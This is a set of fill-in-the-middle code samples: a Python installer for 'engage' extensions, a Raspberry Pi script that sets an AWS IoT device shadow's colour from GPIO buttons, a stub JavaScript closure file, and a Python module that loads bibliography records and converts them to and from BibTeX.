type: 'TimeSpanPrecision'; precision: string; } export const DateTimePrecisionTypeValues = ["Days", "Hours", "Minutes", "Seconds", "Milliseconds"]; export interface StringCase extends DynamicValidator { type: 'StringCase'; textCase: string; } export const StringCaseTypeValues = ["UpperCase", "LowerCase"]; } export const IsNullableValues = ["Yes", "OnlyInMemory", "No"]; export const UniqueIndexValues = ["No", "Yes", "YesAllowNull"];<|fim▁end|>
type: 'StringLength'; multiLine: boolean; min?: number;
<|file_name|>install_extension.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python """This utility installs an engage extension into a deployment home. """ import os import os.path import sys from optparse import OptionParser import shutil import re import logging logger = logging.getLogger(__name__) # enable importing from the python_pkg sub-directory base_src_dir=os.path.abspath(os.path.dirname(__file__)) python_pkg_dir = os.path.join(base_src_dir, "python_pkg") assert os.path.exists(python_pkg_dir), "Python package directory %s does not exist" % python_pkg_dir sys.path.append(python_pkg_dir) from engage.extensions import installed_extensions, extension_versions dist_root = os.path.abspath(os.path.dirname(__file__)) dist_root_parent = os.path.abspath(os.path.join(dist_root, "..")) class EngageExtension(object): def __init__(self, path, name, version, update): self.path = path self.name = name self.version = version self.update = update def _copy_dir(self, src_dirname, target, dry_run=False): src_dir = os.path.join(self.path, src_dirname) dest_dir = os.path.join(os.path.join(target, src_dirname), self.name) if os.path.exists(src_dir): logger.info("Copying %s to %s" % (src_dirname, dest_dir)) if os.path.exists(dest_dir): if self.update: logger.warn("removing old version of %s" % dest_dir) if not dry_run: shutil.rmtree(dest_dir) else: raise Exception("Target directory %s already exists" % dest_dir) if not dry_run: shutil.copytree(src_dir, dest_dir) elif self.update and os.path.exists(dest_dir): logger.warn("removing old version of %s" % dest_dir) if not dry_run: shutil.rmtree(dest_dir) def install(self, dist_root, dry_run=False): if not dry_run: logger.info("Running install of %s to %s" % (self.name, dist_root))<|fim▁hole|> logger.info("Dry run install of %s to %s" % (self.name, dist_root)) self._copy_dir("metadata", dist_root, dry_run=dry_run) dest_engage_pkg_dir = os.path.join(os.path.join(dist_root, "python_pkg"), "engage") self._copy_dir("drivers", dest_engage_pkg_dir, dry_run=dry_run) self._copy_dir("tests", dest_engage_pkg_dir, dry_run=dry_run) self._copy_dir("mgt_backends", dest_engage_pkg_dir, dry_run=dry_run) # For the software packages we copy the individual files to the main package # cache. src_cache_dir = os.path.join(self.path, "sw_packages") dest_cache_dir = os.path.join(dist_root, "sw_packages") if os.path.exists(src_cache_dir): logger.info("Copying software packages from %s to %s" % (src_cache_dir, dest_cache_dir)) for fname in os.listdir(src_cache_dir): src_file = os.path.join(src_cache_dir, fname) dest_file = os.path.join(dest_cache_dir, fname) logger.debug("Copying %s to %s" % (fname, dest_file)) shutil.copyfile(src_file, dest_file) # update the extension file if self.name not in installed_extensions: installed_extensions.append(self.name) extension_versions[self.name] = self.version extns_file = os.path.join(dest_engage_pkg_dir, "extensions.py") logger.info("Updating extensions file %s" % extns_file) with open(extns_file, "rb") as ef: lines = ef.read().split("\n") updated_list = False updated_versions = False if not dry_run: with open(extns_file, "wb") as ef: for line in lines: if re.match("^installed_extensions = ", line): ef.write("installed_extensions = %s\n" % installed_extensions.__repr__()) updated_list = True elif re.match("^extension_versions = ", line): ef.write("extension_versions = %s\n" % extension_versions.__repr__()) updated_versions = True else: ef.write(line + "\n") else: for line in lines: if re.match("^installed_extensions = ", line): sys.stdout.write("installed_extensions = %s\n" % installed_extensions.__repr__()) updated_list = True elif re.match("^extension_versions = ", line): sys.stdout.write("extension_versions = %s\n" % extension_versions.__repr__()) updated_versions = True else: sys.stdout.write(line + "\n") if ((not updated_list) or (not updated_versions)): raise Exception("Extension registration file %s did not have correct format, unable to complete update" % extns_file) logger.info("Successfully installed extension %s" % self.name) def process_args(argv): usage = "usage: %prog [options] path_to_extension" parser = OptionParser(usage=usage) parser.add_option("--dry-run", action="store_true", help="If specified, don't make changes, just log what would be done", default=False) parser.add_option("--update", "-u", action="store_true", help="If specified, override any existing version of the extension", default=False) (options, args) = parser.parse_args(args=argv) if len(args)==0: parser.print_help() sys.exit(0) elif len(args) > 1: parser.error("Expecting exactly one argument, path to extension directory") extension_path = os.path.abspath(args[0]) if not os.path.exists(extension_path): parser.error("Extension directory %s does not exist" % extension_path) extension_name = os.path.basename(extension_path) if os.path.basename(dist_root_parent)=="src": parser.error("Cannot install extension into source tree %s, run from distribution tree" % dist_root) if extension_name in installed_extensions and not options.update: parser.error("Extension %s already installed" % extension_name) version_file = os.path.join(extension_path, "version.txt") if not os.path.exists(version_file): parser.error("Missing version file %s" % version_file) with open(version_file, "rb") as vf: extension_version = vf.read().rstrip() ext = EngageExtension(extension_path, extension_name, extension_version, options.update) return (ext, options) def main(argv=sys.argv[1:]): (ext, opts) = process_args(argv) ext.install(dist_root, dry_run=opts.dry_run) return 0 if __name__ == "__main__": #formatter = logging.Formatter("[%(levelname)s][%(name)s] %(message)s") root_logger = logging.getLogger() root_logger.setLevel(logging.INFO) console_handler = logging.StreamHandler(sys.stdout) console_handler.setLevel(logging.INFO) #console_handler.setFormatter(formatter) root_logger.addHandler(console_handler) logger.setLevel(logging.INFO) sys.exit(main())<|fim▁end|>
else:
<|file_name|>closure.js<|end_file_name|><|fim▁begin|>// Looking at closures // http://stackoverflow.com/q/111102/137001 $(document).ready(function() {<|fim▁hole|> closureTest(); function closureTest() { //console.log } });<|fim▁end|>
<|file_name|>controlUnit.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python import argparse import json import time import logging from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTShadowClient import RPi.GPIO as GPIO <|fim▁hole|>parser.add_argument('-c', '--cert', required=True, help='Certificate file path.') parser.add_argument('-k', '--key', required=True, help='Private key file path.') args = parser.parse_args() def lightbulbShadowCallback_Update(payload, responseStatus, token): if responseStatus == "timeout": print("Update request " + token + " time out!") if responseStatus == "accepted": payloadDict = json.loads(payload) print("~~~~~~~~~~~~~~~~~~~~~~~") print("Update request with token: " + token + " accepted!") print("property: " + str(payloadDict["state"]["desired"]["color"])) print("~~~~~~~~~~~~~~~~~~~~~~~\n\n") if responseStatus == "rejected": print("Update request " + token + " rejected!") def lightBulbShadowCallback_Delete(payload, responseStatus, token): if responseStatus == "timeout": print("Delete request " + token + " time out!") if responseStatus == "accepted": print("~~~~~~~~~~~~~~~~~~~~~~~") print("Delete request with token: " + token + " accepted!") print("~~~~~~~~~~~~~~~~~~~~~~~\n\n") if responseStatus == "rejected": print("Delete request " + token + " rejected!") # Configure logging logger = logging.getLogger("AWSIoTPythonSDK.core") logger.setLevel(logging.DEBUG) streamHandler = logging.StreamHandler() formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') streamHandler.setFormatter(formatter) logger.addHandler(streamHandler) # Init AWSIoTMQTTShadowClient lightBulbShadowClient = AWSIoTMQTTShadowClient("controlUnitClient") lightBulbShadowClient.configureEndpoint(args.endpoint, 8883) lightBulbShadowClient.configureCredentials(args.rootCA, args.key, args.cert) # AWSIoTMQTTShadowClient configuration lightBulbShadowClient.configureAutoReconnectBackoffTime(1, 32, 20) lightBulbShadowClient.configureConnectDisconnectTimeout(10) # 10 sec lightBulbShadowClient.configureMQTTOperationTimeout(5) # 5 sec # Connect to AWS IoT lightBulbShadowClient.connect() # Create a deviceShadow with persistent subscription ControlUnit = lightBulbShadowClient.createShadowHandlerWithName("rpi-sense-hat", True) # Delete shadow JSON doc ControlUnit.shadowDelete(lightBulbShadowCallback_Delete, 5) # Update shadow def updateShadow(color): JSONPayload = '{"state":{"desired":{"color":"' + color + '"}}}' ControlUnit.shadowUpdate(JSONPayload, lightbulbShadowCallback_Update, 5) RED = 9 GREEN = 10 BLUE = 11 GPIO.setmode(GPIO.BCM) GPIO.setup(RED, GPIO.IN) GPIO.setup(GREEN, GPIO.IN) GPIO.setup(BLUE, GPIO.IN) lastButton = None while True: if (lastButton != RED and GPIO.input(RED) == False): lastButton = RED updateShadow("red") if (lastButton != GREEN and GPIO.input(GREEN) == False): lastButton = GREEN updateShadow("green") if (lastButton != BLUE and GPIO.input(BLUE)== False): lastButton = BLUE updateShadow("blue") time.sleep(0.05);<|fim▁end|>
parser = argparse.ArgumentParser(description='Lightbulb control unit.') parser.add_argument('-e', '--endpoint', required=True, help='The AWS Iot endpoint.') parser.add_argument('-r', '--rootCA', required=True, help='Root CA file path.')
<|file_name|>operations.py<|end_file_name|><|fim▁begin|>"""This module contains functions to :meth:`~reload` the database, load work and citations from there, and operate BibTeX""" import importlib import re import textwrap import warnings import subprocess from copy import copy from collections import OrderedDict from bibtexparser.bwriter import BibTexWriter from bibtexparser.bibdatabase import BibDatabase from .collection_helpers import oget, oset, dget, dset, dhas from .collection_helpers import consume, setitem, callable_get from .models import DB, Year from .dbindex import parse_varname, year_file from .utils import import_submodules from .utils import parse_bibtex from .rules import ConvertDict, ConvertWork, old_form_to_new from . import config WORK_CACHE = {} CITATION_CACHE = {} GROUP_CACHE = {} def load_work(): """Load a list of all work in the database""" return list(DB.work()) def load_citations(): """Load a list of all citations""" return list(DB.citations()) def load_places_vars(): """Load all places from the database It generates tuples with variable name and Place object Doctest: .. doctest:: >>> 'arXiv' in [varname for varname, _ in load_places_vars()] True """ places = config.MODULES["places"] for varname, varvalue in places.__dict__.items(): if isinstance(varvalue, places.Place): yield varname, varvalue def load_work_map(year): """Load all work from a given year file It generates tuples with variable name and Work object Doctest: .. doctest:: >>> reload() >>> sorted([(work.year, key) for key, work in load_work_map(2015)]) [(2014, 'murta2014a'), (2015, 'pimentel2015a')] (2014, 'murta2014a') appears because it has an alias in 2015 """ module = "y{}.py".format(year) if isinstance(year, int) else year if module not in WORK_CACHE: module = "y9999.py" worklist = WORK_CACHE[module] for key, work in worklist.__dict__.items(): if isinstance(work, worklist.Work): oset(work, "metakey", key) yield key, work def work_by_varname(varname, year=None): """Load work by varname Doctest: .. doctest:: >>> reload() >>> work = work_by_varname('murta2014a') >>> work.year 2014 """ if year is None: year = int(parse_varname(varname, 2) or -1) module = "y{}.py".format(year) if isinstance(year, int) else year if module not in WORK_CACHE: return worklist = WORK_CACHE[module] return getattr(worklist, varname, None) def load_work_map_all_years(): """Load all work from all years Doctest: .. doctest:: >>> reload() >>> sorted([(work.year, key) for key, work in load_work_map_all_years()]) [(2008, 'freire2008a'), (2014, 'murta2014a'), (2014, 'murta2014a'), (2015, 'pimentel2015a')] (2014, 'murta2014a') appears twice because it has an alias in 2015 """ years = reversed(sorted(WORK_CACHE.keys())) for year in years: yield from load_work_map(year) def _clear_db(): """Erase database""" from .approaches import APPROACHES APPROACHES.clear() importlib.invalidate_caches() DB.clear_places() DB.clear_work() DB.clear_citations() def _reload_work(): """Reload work and create WORD_CACHE""" for key, module in import_submodules(config.MODULES["work"]).items(): yname = key.split(".")[-1] fname = (yname + ".py") WORK_CACHE[fname] = module if not yname.startswith("y") or not yname[1:].isdigit(): warnings.warn( "Invalid name for file {}. Year discovery may fail".format(key) ) def reload(work_func=None): """Reload all the database Doctest: ..doctest:: >>> reload() >>> from snowballing.example.database.work.y2014 import murta2014a >>> murta2014a.metakey 'murta2014a' >>> from snowballing.example.database.work.y2015 import murta2014a as alias >>> alias is murta2014a True """ _clear_db() if config.MODULES["places"]: importlib.reload(config.MODULES["places"]) _reload_work() import_submodules(config.MODULES["citations"]) import_submodules(config.MODULES["groups"]) if getattr(config, "CHECK_DEPRECATION", True): check_config_deprecation() for key, work in load_work_map_all_years(): oset(work, "metakey", key) if work_func: work_func(work, key) for alias in config.get_work_aliases(work): year = config.get_alias_year(work, alias) module = "y{}.py".format(year) if isinstance(year, int) else year if module not in WORK_CACHE: module = "y9999.py" setattr(WORK_CACHE[module], key, work) def bibtex_to_info(citation, rules=None): """Convert BibTeX dict from bibtexparse to info dict for adding a db entry Doctest: .. doctest:: >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J'}) {'place1': '', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'display': 'pim', 'pyref': 'pim0a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'year': '2017'}) {'place1': '', 'year': 2017, 'name': 'a', 'authors': 'Pim, J', 'display': 'pim', 'pyref': 'pim2017a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'year': '2017 [in press]'}) {'place1': '', 'year': 2017, 'name': 'a', 'authors': 'Pim, J', 'note': 'in press', 'display': 'pim', 'pyref': 'pim2017a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'pages': '1--5'}) {'place1': '', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'pp': '1--5', 'display': 'pim', 'pyref': 'pim0a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'journal': 'CiSE'}) {'place1': 'CiSE', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'place': 'CiSE', 'display': 'pim', 'pyref': 'pim0a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'ENTRYTYPE': 'article'}) {'place1': '', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'entrytype': 'article', 'display': 'pim', 'pyref': 'pim0a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'other': 'a'}) {'place1': '', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'display': 'pim', 'pyref': 'pim0a', 'other': 'a'} """ rules = rules or config.BIBTEX_TO_INFO return ConvertDict(rules).run(citation) def extract_info(article, rules=None): """Extract info from google scholar article Doctest: .. doctest:: Mock: >>> class Article: pass >>> article = Article() >>> article.as_citation = lambda: ''' ... @inproceedings{murta2014noworkflow, ... title={noWorkflow: capturing and analyzing provenance of scripts}, ... author={Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, ... booktitle={International Provenance and Annotation Workshop}, ... pages={71--83}, ... year={2014}, ... organization={Springer} ... }''' >>> article.attrs = { ... 'excerpt': ['Abstract'], ... 'cluster_id': ['5458343950729529273'], ... 'url_citations': ['http://scholar.google.com/scholar?cites=5458343950729529273&as_sdt=2005&sciodt=0,5&hl=en'], ... } >>> article.div = None Test: >>> reload() # Deterministic name >>> extract_info(article) {'place1': 'International Provenance and Annotation Workshop', 'year': 2014, 'pp': '71--83', 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing and analyzing provenance of scripts', 'entrytype': 'inproceedings', 'place': 'IPAW', 'display': 'murta', 'pyref': 'murta2014b', 'organization': 'Springer', 'ID': 'murta2014noworkflow', 'excerpt': 'Abstract', 'cluster_id': '5458343950729529273', 'scholar': 'http://scholar.google.com/scholar?cites=5458343950729529273&as_sdt=2005&sciodt=0,5&hl=en'} """ rules = rules or config.BIBTEX_TO_INFO as_citation = article.as_citation() if not isinstance(as_citation, str): as_citation = as_citation.decode("utf-8") citation = parse_bibtex(as_citation)[0] converter = ConvertDict(rules) return converter.run(citation, article=article) def info_to_code(article, rules=None): """Convert info dict into code Required attributes: * pyref * display * year * name * place || place1 Doctest: .. doctest:: >>> print(info_to_code({ ... 'pyref': 'pimentel2017a', ... 'display': 'disp', ... 'year': 2017, ... 'name': 'snowballing', ... 'authors': 'Pimentel, Joao', ... 'place1': 'CACM' ... })) <BLANKLINE> pimentel2017a = DB(Work( 2017, "snowballing", display="disp", authors="Pimentel, Joao", place1="CACM", )) With place: >>> print(info_to_code({ ... 'pyref': 'murta2014a', ... 'display': 'noworkflow', ... 'year': 2014, ... 'name': 'noWorkflow: capturing and analyzing provenance of scripts', ... 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', ... 'place': config.MODULES['places'].IPAW, ... })) <BLANKLINE> murta2014a = DB(Work( 2014, "noWorkflow: capturing and analyzing provenance of scripts", display="noworkflow", authors="Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana", place=IPAW, )) With string place: >>> print(info_to_code({ ... 'pyref': 'murta2014a', ... 'display': 'noworkflow', ... 'year': 2014, ... 'name': 'noWorkflow: capturing and analyzing provenance of scripts', ... 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', ... 'place': 'IPAW', ... })) <BLANKLINE> murta2014a = DB(Work( 2014, "noWorkflow: capturing and analyzing provenance of scripts", display="noworkflow", authors="Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana", place=IPAW, )) With _work_type, due, excerpt, others: >>> print(info_to_code({ ... '_work_type': 'WorkSnowball', ... 'due': 'Unrelated to my snowballing', ... 'excerpt': 'Ignore excerpt', ... 'other': 'Do not ignore other fields', ... 'pyref': 'murta2014a', ... 'display': 'noworkflow', ... 'year': 2014, ... 'name': 'noWorkflow: capturing and analyzing provenance of scripts', ... 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', ... 'place': config.MODULES['places'].IPAW, ... })) <BLANKLINE> murta2014a = DB(WorkSnowball( 2014, "noWorkflow: capturing and analyzing provenance of scripts", due="Unrelated to my snowballing", display="noworkflow", authors="Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana", place=IPAW, other='Do not ignore other fields', )) """ rules = rules or config.INFO_TO_INSERT info = copy(article) converter = ConvertDict(rules) return converter.run(info) def set_by_info(work, info, set_scholar=True, rules=None): """Find attributes that should be modified in a work object to make it match an info object""" rules = rules or config.BIBTEX_TO_INFO rules.get("<set_before>", lambda x, y: None)(work, info) work_keys = {k for k in work.__dict__.keys() if not k.startswith("__")} - rules["<set_ignore_keys>"] meta_keys = info.keys() - rules.get("<set_ignore_keys>", set()) show_result = OrderedDict( (key, None) for key in rules.get("<set_order>", []) ) set_result = {} shared = meta_keys & work_keys for key in shared: value = info[key] add = False if key in rules.get("<set_ignore_but_show>", set()): add = True elif getattr(work, key) != value and key not in getattr(work, rules.get("<set_ignore_attr>", "ignoreattrs"), set()): add = True set_result[key] = (value, getattr(work, key)) elif key in rules.get("<set_always_show>", set()): add = True if add: show_result[key] = (value, getattr(work, key)) for key in meta_keys - work_keys: value = info[key] set_result[key] = (value, None) show_result[key] = (value, "") if set_scholar and rules.get("<scholar_ok>") and not hasattr(work, rules["<scholar_ok>"]): set_result[rules["<scholar_ok>"]] = (True, None) result = { "show": show_result, "set": set_result, } if "<pos_diff>" in rules: rules["<pos_diff>"](work, info, result) return result def changes_dict_to_set_attribute(metakey, changes_dict, end=";"): """Convert dictionart of changes to set_attribute instructions""" result = [] for key, (value, old) in changes_dict.items(): result.append("set_attribute({!r}, {!r}, {!r}, old={!r})".format(metakey, key, value, old)) return "\n".join(result) + end def citation_text(workref, cited, ref="", backward=False): """Create code for citation Arguments: * `workref` -- work varname that is cited (by default) * `cited` -- work info dict that cites the work (by default) Keyword arguments: * `ref` -- citation number * `backward` -- invert citation: `workref` cites `cited` Doctest: .. doctest:: >>> print(citation_text('freire2008a', {'pyref': 'murta2014a'})) <BLANKLINE> DB(Citation( murta2014a, freire2008a, ref="", contexts=[ <BLANKLINE> ], )) <BLANKLINE> >>> print(citation_text('pimentel2015a', {'pyref': 'murta2014a'}, backward=True, ref="[8]")) <BLANKLINE> DB(Citation( pimentel2015a, murta2014a, ref="[8]", contexts=[ <BLANKLINE> ], )) <BLANKLINE> """ pyref = dget(cited, "pyref") thepyref = pyref if backward: pyref, workref = workref, pyref return textwrap.dedent(""" DB(Citation( {pyref}, {workref}, ref="{ref}", contexts=[ ], )) """.format(**locals())) def compare_paper_to_work(letter, key, work, paper): """Compares paper info to work Arguments: * `letter` -- indicates last letter * `key` -- indicates the key ID in BibTeX * `work` -- work object * `paper` -- paper info dict Returns: work, letter * If it doesn't match, work is None Doctest: .. doctest:: >>> reload() >>> work = work_by_varname('murta2014a') Fail: >>> paper = {'pyref': 'pimentel2017a', 'authors': 'Pimentel, Joao', 'name': 'Other', 'year': 2017} >>> compare_paper_to_work(ord("a") - 1, 'pimentel2017a', work, paper) (None, 98) >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) (None, 96) Cluster ID: >>> paper['cluster_id'] = '5458343950729529273' >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) == (work, 96) True Alias: >>> paper = {'pyref': 'chirigati2015a', 'authors': 'Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: Capturing and Analyzing Provenance of Scripts', 'year': 2015} >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) == (work, 96) True Name: >>> paper = {'pyref': 'murta2014a', 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing and analyzing provenance of scripts', 'year': 2014} >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) == (work, 96) True Similar Name fail: >>> paper = {'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing provenance of scripts', 'year': 2014} >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) (None, 96) Similar Name works due to same place: >>> paper = {'pyref': 'murta2014a', 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing provenance of scripts', 'year': 2014, 'place': 'IPAW'} >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) == (work, 96) True """ if work is None: return None, letter if key.startswith(dget(paper, "pyref", "<invalid>")[:-1]): lastletter = key[-1] if key[-1].isalpha() else "a" letter = max(ord(lastletter) + 1, letter) if config.info_work_match(paper, work): dset(paper, "pyref", key) return work, letter return None, letter def find_work_by_info(paper, pyrefs=None, rules=None): """Find work by paper info dict Limits search for specific year (or all years, if year is 0) Generates 'place' based on 'entrytype' Converts 'school' -> 'local' Tries to get varname from 'ID' in case the bibtex were generated from our db If it finds the work, it returns it Otherwise, it updates pyref and display to include a valid letter Doctest: .. doctest:: >>> reload() >>> work = work_by_varname('murta2014a') >>> paper = {'pyref': 'murta2014a', 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing and analyzing provenance of scripts', 'year': 2014} >>> find_work_by_info(paper) == work True >>> paper = {'pyref': 'murta2014a', 'authors': 'Murta, Leonardo', 'name': 'Other', 'year': 2014, 'display': 'murta'} >>> find_work_by_info(paper) is None True >>> paper['pyref'] 'murta2014b' >>> paper['display'] 'murta b' """ rules = rules or config.FIND_INFO_WORK def update_old(old, new, rules): ignore = callable_get(rules, "<ignore>", []) for key, value in new.items(): if key not in ignore: old[key] = value for key, value in rules.get("<skip>", []): if paper.get(key, "") == value: dset(paper, "pyref", "None") return None pyrefs = pyrefs or set() letter = ord("a") - 1 convert = ConvertDict(rules) new_paper = convert.run(paper) old_paper, paper = paper, new_paper worklist = load_work_map(paper["_year"]) if paper["_year"] == 0: worklist = load_work_map_all_years() if "_work" in paper: key = paper["_key"] work = paper["_work"] work, letter = compare_paper_to_work(letter, key, work, paper) if work: update_old(old_paper, paper, rules) return work for key, work in worklist: work, letter = compare_paper_to_work(letter, key, work, paper) if work: update_old(old_paper, paper, rules) return work for key in pyrefs: if dhas(paper, "pyref") and key.startswith(dget(paper, "pyref")): lastletter = key[-1] if key[-1].isalpha() else "a" letter = max(ord(lastletter) + 1, ord(letter)) if letter != ord("a") - 1: letter = chr(letter) config.set_info_letter(paper, letter) update_old(old_paper, paper, rules) return None def find_citation(citer, cited): """Find citation in the local database Returns the citation if the `citer` work cites the `cited` work Doctest: .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> freire2008a = work_by_varname("freire2008a") >>> pimentel2015a = work_by_varname("pimentel2015a") >>> citation = find_citation(murta2014a, freire2008a) >>> citation is None False >>> citation.ref '5' Not found: >>> citation = find_citation(pimentel2015a, freire2008a) >>> citation is None True """ for citation in load_citations(): if citation.work == citer and citation.citation == cited: return citation return None def find_global_local_citation(citer, cited, file=None): """Find citations locally and globally for the works We use it to check if there is citation redefinition Doctest: .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> freire2008a = work_by_varname("freire2008a") >>> pimentel2015a = work_by_varname("pimentel2015a") >>> glo, loc = find_global_local_citation(murta2014a, freire2008a, "random") >>> glo is None False >>> glo.ref '5' >>> loc is None True >>> fname = "murta2014a" >>> glo, loc = find_global_local_citation(murta2014a, freire2008a, fname) >>> glo is None False >>> glo.ref '5' >>> loc is None False >>> loc is glo True """ glob, loc = None, None for citation in load_citations(): if citation.work == citer and citation.citation == cited: if file == citation._citations_file or not file: glob = loc = citation break else: glob = citation return glob, loc def find_local_citation(wo1, wo2, backward, citation_file=None, warning=None): if backward: wo1, wo2 = wo2, wo1 global_citation, local_citation = find_global_local_citation( wo1, wo2, file=citation_file ) if global_citation and not local_citation and warning: warning("Duplicate citation: {} -> {}".format( oget(wo1, "metakey"), oget(wo2, "metakey"), )) return local_citation def work_to_bibtex_entry(work, name=None, homogeneize=True, acronym=False, rules=None): """Convert work to BibTeX entry dict for bibtexparser Doctest: .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> result = work_to_bibtex_entry(murta2014a) >>> list(result) ['ID', 'address', 'publisher', 'pages', 'author', 'title', 'ENTRYTYPE', 'booktitle', 'year'] >>> result['ID'] 'murta2014a' >>> result['address'] 'Cologne, Germany' >>> result['publisher'] 'Springer' >>> result['pages'] '71--83' >>> result['booktitle'] 'International Provenance and Annotation Workshop' >>> result['author'] # doctest: +ELLIPSIS 'Murta, Leonardo and Braganholo, Vanessa and ... and Freire, Juliana' >>> result['title'] 'no{W}orkflow: capturing and analyzing provenance of scripts' >>> result['year'] '2014' >>> result['ENTRYTYPE'] 'inproceedings' Custom name: >>> result = work_to_bibtex_entry(murta2014a, name="other") >>> list(result) ['ID', 'address', 'publisher', 'pages', 'author', 'title', 'ENTRYTYPE', 'booktitle', 'year'] >>> result['ID'] 'other' Use acronym for place name: >>> result = work_to_bibtex_entry(murta2014a, acronym=True) >>> list(result) ['ID', 'address', 'publisher', 'pages', 'author', 'title', 'ENTRYTYPE', 'booktitle', 'year'] >>> result['booktitle'] 'IPAW' """ converter = ConvertWork(rules or config.WORK_TO_BIBTEX) return converter.run(work, new=OrderedDict({ "_name": name, "_acronym": acronym, "_homogeneize": homogeneize, })) def work_to_bibtex(work, name=None, acronym=False, rules=None): """Convert work to bibtex text Doctest: .. doctest:: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> print(work_to_bibtex(murta2014a)) @inproceedings{murta2014a, address = {Cologne, Germany}, author = {Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, booktitle = {International Provenance and Annotation Workshop}, pages = {71--83}, publisher = {Springer}, title = {no{W}orkflow: capturing and analyzing provenance of scripts}, year = {2014} } <BLANKLINE> <BLANKLINE> Custom name: >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> print(work_to_bibtex(murta2014a, name="other")) @inproceedings{other, address = {Cologne, Germany}, author = {Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, booktitle = {International Provenance and Annotation Workshop}, pages = {71--83}, publisher = {Springer}, title = {no{W}orkflow: capturing and analyzing provenance of scripts}, year = {2014} } <BLANKLINE> <BLANKLINE><|fim▁hole|> @inproceedings{murta2014a, address = {Cologne, Germany}, author = {Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, booktitle = {IPAW}, pages = {71--83}, publisher = {Springer}, title = {no{W}orkflow: capturing and analyzing provenance of scripts}, year = {2014} } <BLANKLINE> <BLANKLINE> """ result = work_to_bibtex_entry(work, name=name, acronym=acronym, rules=rules) db = BibDatabase() db.entries = [result] writer = BibTexWriter() writer.indent = " " return writer.write(db) def match_bibtex_to_work(bibtex_str): """Find works by bibtex entries Returns a list of matches: (entry, work) Doctest: .. doctest:: >>> reload() >>> bibtex = ''' @inproceedings{murta2014a, ... address = {Cologne, Germany}, ... author = {Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, ... booktitle = {IPAW}, ... pages = {71--83}, ... publisher = {Springer}, ... title = {no{W}orkflow: capturing and analyzing provenance of scripts}, ... year = {2014} ... } ''' >>> works = match_bibtex_to_work(bibtex) >>> murta2014a = work_by_varname("murta2014a") >>> works[0][1] is murta2014a True """ entries = parse_bibtex(bibtex_str) return [ (entry, find_work_by_info(bibtex_to_info(copy(entry)))) for entry in entries ] def find(text): """Find work by text in any of its attributes""" words = text.split() for work in load_work(): match = True for word in words: if not any(word.lower() in str(getattr(work, attr)).lower() for attr in dir(work) if not attr.startswith("_")): match = False break if match: yield work def find_line(work): """Find work position in file Arguments: * `work` -- work object Doctest: .. doctest:: >>> from .operations import reload, work_by_varname >>> reload() >>> murta2014a = work_by_varname("murta2014a") >>> find_line(murta2014a) 6 """ import re with open(year_file(oget(work, "year")), "rb") as f: return [ index for index, line in enumerate(f) if re.findall("(^{}\\s=)".format(oget(work, "metakey")).encode(), line) ][0] + 1 def invoke_editor(work): """Open work in a given line with the configured editor""" if not config.TEXT_EDITOR or not config.LINE_PARAMS: warnings.warn("You must set the config.TEXT_EDITOR and config.LINE_PARAMS to use this function") return subprocess.call(( config.TEXT_EDITOR + " " + config.LINE_PARAMS.format( year_path=year_file(oget(work, "year")), line=find_line(work) ) ), shell=True) def create_info_code(nwork, info, citation_var, citation_file, should_add, ref=""): """Create insertion code with both code and citation""" citations = "" text = "insert('''" if nwork is None: text += info_to_code(info) + "\n" if should_add["citation"] and citation_var: text += 